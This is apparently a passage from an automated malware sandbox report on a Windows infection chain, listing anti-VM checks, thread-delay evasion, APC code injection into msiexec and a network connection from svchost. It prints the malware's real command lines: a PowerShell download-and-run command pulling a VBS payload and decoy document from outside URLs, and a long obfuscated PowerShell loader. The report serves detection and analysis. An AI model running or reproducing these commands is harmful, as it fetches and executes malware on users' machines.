                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5657Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4224Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7285Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2465Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7574Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2162Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5820Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\wscript.exe TID: 600Thread sleep time: -30000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep count: 7285 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3140Thread sleep count: 2465 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7116Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                        Source: C:\Windows\System32\svchost.exe TID: 6268Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B80B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,21_2_00007DF4F3B80B80
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3BED66C GetSystemInfo,21_2_00007DF4F3BED66C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local
                        Source: powershell.exe, 00000001.00000002.3143149575.0000023D99D62000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                        Source: wscript.exe, 00000003.00000002.1795141095.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1768741491.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1765468533.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1787036668.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1764019779.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1767647583.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1761425230.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1762565685.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1769551481.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1769163763.00000127C8A95000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2986429407.000001262D82B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: wscript.exe, 00000003.00000003.1767647583.00000127C8A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1787036668.00000127C8A2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1768585526.00000127C8A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1768741491.00000127C8A34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1769428234.00000127C8A34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1795141095.00000127C8A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1765468533.00000127C8A38000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1769163763.00000127C8A2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1764062911.00000127C8A11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                        Source: powershell.exe, 00000001.00000002.3143149575.0000023D99CD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1957402810.00000201E8715000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_049C8F99 LdrInitializeThunk,11_2_049C8F99
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_005E0283 mov eax, dword ptr fs:[00000030h]20_3_005E0283

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Early bird code injection technique detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.120.127.215 3847
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: amsi64_6216.amsi.csv, type: OTHER
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6216, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5232, type: MEMORYSTR
                        Allocates memory in foreign processes
                        Source: C:\Program Files\Windows Media Player\wmprph.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 25C3F5D0000 protect: page read and write
                        Queues an APC in another process (thread injection)
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3D20000Jump to behavior
                        Source: C:\Program Files\Windows Media Player\wmprph.exeMemory written: C:\Windows\System32\dllhost.exe base: 25C3F5D0000
                        Source: C:\Program Files\Windows Media Player\wmprph.exeMemory written: C:\Windows\System32\dllhost.exe base: 7FF70F3314E0
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\rdc7di6ccs.docx" /o ""Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"
                        Source: C:\Program Files\Windows Media Player\wmprph.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'c:\users\public\g8ix97hz.vbs';downloadandrun -url 'https://www.fornid.com/lm/list%20of%20required%20items%20and%20services.docx' -destination 'c:\users\public\rdc7di6ccs.docx'
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$blodudtrdningen='afhndede';;$noncooperator='cryophorus';;$thalassinian='josephina';;$maste193='forslvendes';;$downthrust=$host.name; function symboltabeller($blowtube){if ($downthrust) {$morphogenic='ukammerater';$overstegne=2;$smugleriernes=$overstegne}do{$usaglige+=$blowtube[$smugleriernes];$smugleriernes+=3} until(!$blowtube[$smugleriernes])$usaglige}function cleavingly($ethnicon){ .($gudmors) ($ethnicon)}$medioanterior=symboltabeller 'ben eexttw.f w';$medioanterior+=symboltabeller 'reeunblacb,lo,i kebrn ft';$forstdelsernes=symboltabeller 'rym ro dz.riopl,aldeaam/';$udlodning=symboltabeller 'p t.klbls f1se2';$rival='n [,in be sttr.fjsase mrgivmoisacnee mpbeo cibonanttime a lnedapagdoecor,l] : d: ss emoc u krs i ttsayfopb.r so t po bcklo,rlf =vu$ us dduld oped en,ei dnnig';$forstdelsernes+=symboltabeller 'mo5s .no0mo t(tiwimi.on pd oavwdoso. lynchtf. p1 e0me.af0k,;ap cowt iminsn6 4f ; unx,a6 u4ac; l fargrvga:.e1ab3u 1in.s 0 f)la logu,e kchokino l/.u2sh0 e1un0ha0me1 f0sa1 i kefidi argre rf jo nx l/t 1,a3ac1ca. ,0';$hoejkulturer=symboltabeller ' duansgneb rti- audg ,e on .t';$eliksirers=symboltabeller '.oh pt tc,panspl:fe/ni/chwinw hwd . atundskesij .bde.chc ho am ./exew fsk/ stokprislf tp ep r nn xet .scsche ea e>unh ftd,t np she:fl/.l/,iw swbew .o a,krgeemrcseo ksa afolaud gagatanu srmie,e.spi kt ./ seenfpf/ rs.eketiinfsutmeeh.r,anamead.v sane ia';$programmeringsskik1=symboltabeller 'a >';$gudmors=symboltabeller ' bic eh x';$strudsmaven='circumscript';$fastprissystemet='\even.lar';cleavingly (symboltabeller '.a$esga.lepoarblaakal e: ai goved fi sn .etrs b=a,$stebrnu vap:emab pmapmedc a tt agu+s $ fe,abes tsepsirfoiges.es,uytis.mt teo ms.ek,t');cleavingly (symboltabeller ' c$ang olkvohabroa lkv:spvk a .apabloerenbofruatebder aistkdy=pr$ resolazi dkt,s kiskrune .r fsch.sasnepprlopitetra( a$anpsyr roubgvirfuavim.amskefor ei ond.g wsm sr kprihekte1 ,)');cleavingly (symboltabeller $rival);$eliksirers=$vaabenfabrik[0];$portor=(symboltabeller 're$prg,tlneow,bs.ap lf,:.aafrtdienol i ,e kr .v eiden fdwhumeer = anu enywin- kotrbstj,yebrcmitde besryy os.ttr.ea mka. i$ bm lelyd siraoulapena.t eedir itho r');cleavingly ($portor);cleavingly (symboltabeller 's $.iavitbaemilmiitoewirinvegiunntidduupae e. hs es a dprescr ,s s[wu$vrhruo,pe jh,kscu ul kthyuenru ed r e].r=an$plfp obirpasadtkad.be elbisa enerl nteefus');$pastina=symboltabeller 've$sea ett,e ll oi,oemirruvkaimin tdopu aesk. fd uo wopn cl,iodeal d kf,ei el sed (bo$saefel li,iknas ei nr decorbesbe,in$ sbotfiem.mfin pi bnddg osh.fapu plledobtot)';$stemningsfuldt=$iodines;cleavingly (symboltabeller 'sm$ agk.lanoc,bg.a.rl u:afw iemoe ukmdechn ed hus dsefaal,ru gretunehar tn fe is t= e(ertc e suntp -alp rao,tfohc vi$,rs ntkie sm bn aiunneggfis.ofwaur lafd t.a)');while (!$weekendudflugternes) {cleavingly (symboltabeller ' g$geghelb,o ,b a klan:trf,no de
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" ";$blodudtrdningen='afhndede';;$noncooperator='cryophorus';;$thalassinian='josephina';;$maste193='forslvendes';;$downthrust=$host.name; function symboltabeller($blowtube){if ($downthrust) {$morphogenic='ukammerater';$overstegne=2;$smugleriernes=$overstegne}do{$usaglige+=$blowtube[$smugleriernes];$smugleriernes+=3} until(!$blowtube[$smugleriernes])$usaglige}function cleavingly($ethnicon){ .($gudmors) ($ethnicon)}$medioanterior=symboltabeller 'ben eexttw.f w';$medioanterior+=symboltabeller 'reeunblacb,lo,i kebrn ft';$forstdelsernes=symboltabeller 'rym ro dz.riopl,aldeaam/';$udlodning=symboltabeller 'p t.klbls f1se2';$rival='n [,in be sttr.fjsase mrgivmoisacnee mpbeo cibonanttime a lnedapagdoecor,l] : d: ss emoc u krs i ttsayfopb.r so t po bcklo,rlf =vu$ us dduld oped en,ei dnnig';$forstdelsernes+=symboltabeller 'mo5s .no0mo t(tiwimi.on pd oavwdoso. lynchtf. p1 e0me.af0k,;ap cowt iminsn6 4f ; unx,a6 u4ac; l fargrvga:.e1ab3u 1in.s 0 f)la logu,e kchokino l/.u2sh0 e1un0ha0me1 f0sa1 i kefidi argre rf jo nx l/t 1,a3ac1ca. ,0';$hoejkulturer=symboltabeller ' duansgneb rti- audg ,e on .t';$eliksirers=symboltabeller '.oh pt tc,panspl:fe/ni/chwinw hwd . atundskesij .bde.chc ho am ./exew fsk/ stokprislf tp ep r nn xet .scsche ea e>unh ftd,t np she:fl/.l/,iw swbew .o a,krgeemrcseo ksa afolaud gagatanu srmie,e.spi kt ./ seenfpf/ rs.eketiinfsutmeeh.r,anamead.v sane ia';$programmeringsskik1=symboltabeller 'a >';$gudmors=symboltabeller ' bic eh x';$strudsmaven='circumscript';$fastprissystemet='\even.lar';cleavingly (symboltabeller '.a$esga.lepoarblaakal e: ai goved fi sn .etrs b=a,$stebrnu vap:emab pmapmedc a tt agu+s $ fe,abes tsepsirfoiges.es,uytis.mt teo ms.ek,t');cleavingly (symboltabeller ' c$ang olkvohabroa lkv:spvk a .apabloerenbofruatebder aistkdy=pr$ resolazi dkt,s kiskrune .r fsch.sasnepprlopitetra( a$anpsyr roubgvirfuavim.amskefor ei ond.g wsm sr kprihekte1 ,)');cleavingly (symboltabeller $rival);$eliksirers=$vaabenfabrik[0];$portor=(symboltabeller 're$prg,tlneow,bs.ap lf,:.aafrtdienol i ,e kr .v eiden fdwhumeer = anu enywin- kotrbstj,yebrcmitde besryy os.ttr.ea mka. i$ bm lelyd siraoulapena.t eedir itho r');cleavingly ($portor);cleavingly (symboltabeller 's $.iavitbaemilmiitoewirinvegiunntidduupae e. hs es a dprescr ,s s[wu$vrhruo,pe jh,kscu ul kthyuenru ed r e].r=an$plfp obirpasadtkad.be elbisa enerl nteefus');$pastina=symboltabeller 've$sea ett,e ll oi,oemirruvkaimin tdopu aesk. fd uo wopn cl,iodeal d kf,ei el sed (bo$saefel li,iknas ei nr decorbesbe,in$ sbotfiem.mfin pi bnddg osh.fapu plledobtot)';$stemningsfuldt=$iodines;cleavingly (symboltabeller 'sm$ agk.lanoc,bg.a.rl u:afw iemoe ukmdechn ed hus dsefaal,ru gretunehar tn fe is t= e(ertc e suntp -alp rao,tfohc vi$,rs ntkie sm bn aiunneggfis.ofwaur lafd t.a)');while (!$weekendudflugternes) {cleavingly (symboltabeller ' g$geghelb,o ,b a klan:trf,no de
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command function downloadandrun([string]$url, [string]$destination) { invoke-webrequest -uri $url -outfile $destination ; start-process -filepath $destination -wait };downloadandrun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'c:\users\public\g8ix97hz.vbs';downloadandrun -url 'https://www.fornid.com/lm/list%20of%20required%20items%20and%20services.docx' -destination 'c:\users\public\rdc7di6ccs.docx'Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ";$blodudtrdningen='afhndede';;$noncooperator='cryophorus';;$thalassinian='josephina';;$maste193='forslvendes';;$downthrust=$host.name; function symboltabeller($blowtube){if ($downthrust) {$morphogenic='ukammerater';$overstegne=2;$smugleriernes=$overstegne}do{$usaglige+=$blowtube[$smugleriernes];$smugleriernes+=3} until(!$blowtube[$smugleriernes])$usaglige}function cleavingly($ethnicon){ .($gudmors) ($ethnicon)}$medioanterior=symboltabeller 'ben eexttw.f w';$medioanterior+=symboltabeller 'reeunblacb,lo,i kebrn ft';$forstdelsernes=symboltabeller 'rym ro dz.riopl,aldeaam/';$udlodning=symboltabeller 'p t.klbls f1se2';$rival='n [,in be sttr.fjsase mrgivmoisacnee mpbeo cibonanttime a lnedapagdoecor,l] : d: ss emoc u krs i ttsayfopb.r so t po bcklo,rlf =vu$ us dduld oped en,ei dnnig';$forstdelsernes+=symboltabeller 'mo5s .no0mo t(tiwimi.on pd oavwdoso. lynchtf. p1 e0me.af0k,;ap cowt iminsn6 4f ; unx,a6 u4ac; l fargrvga:.e1ab3u 1in.s 0 f)la logu,e kchokino l/.u2sh0 e1un0ha0me1 f0sa1 i kefidi argre rf jo nx l/t 1,a3ac1ca. ,0';$hoejkulturer=symboltabeller ' duansgneb rti- audg ,e on .t';$eliksirers=symboltabeller '.oh pt tc,panspl:fe/ni/chwinw hwd . atundskesij .bde.chc ho am ./exew fsk/ stokprislf tp ep r nn xet .scsche ea e>unh ftd,t np she:fl/.l/,iw swbew .o a,krgeemrcseo ksa afolaud gagatanu srmie,e.spi kt ./ seenfpf/ rs.eketiinfsutmeeh.r,anamead.v sane ia';$programmeringsskik1=symboltabeller 'a >';$gudmors=symboltabeller ' bic eh x';$strudsmaven='circumscript';$fastprissystemet='\even.lar';cleavingly (symboltabeller '.a$esga.lepoarblaakal e: ai goved fi sn .etrs b=a,$stebrnu vap:emab pmapmedc a tt agu+s $ fe,abes tsepsirfoiges.es,uytis.mt teo ms.ek,t');cleavingly (symboltabeller ' c$ang olkvohabroa lkv:spvk a .apabloerenbofruatebder aistkdy=pr$ resolazi dkt,s kiskrune .r fsch.sasnepprlopitetra( a$anpsyr roubgvirfuavim.amskefor ei ond.g wsm sr kprihekte1 ,)');cleavingly (symboltabeller $rival);$eliksirers=$vaabenfabrik[0];$portor=(symboltabeller 're$prg,tlneow,bs.ap lf,:.aafrtdienol i ,e kr .v eiden fdwhumeer = anu enywin- kotrbstj,yebrcmitde besryy os.ttr.ea mka. i$ bm lelyd siraoulapena.t eedir itho r');cleavingly ($portor);cleavingly (symboltabeller 's $.iavitbaemilmiitoewirinvegiunntidduupae e. hs es a dprescr ,s s[wu$vrhruo,pe jh,kscu ul kthyuenru ed r e].r=an$plfp obirpasadtkad.be elbisa enerl nteefus');$pastina=symboltabeller 've$sea ett,e ll oi,oemirruvkaimin tdopu aesk. fd uo wopn cl,iodeal d kf,ei el sed (bo$saefel li,iknas ei nr decorbesbe,in$ sbotfiem.mfin pi bnddg osh.fapu plledobtot)';$stemningsfuldt=$iodines;cleavingly (symboltabeller 'sm$ agk.lanoc,bg.a.rl u:afw iemoe ukmdechn ed hus dsefaal,ru gretunehar tn fe is t= e(ertc e suntp -alp rao,tfohc vi$,rs ntkie sm bn aiunneggfis.ofwaur lafd t.a)');while (!$weekendudflugternes) {cleavingly (symboltabeller ' g$geghelb,o ,b a klan:trf,no deJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
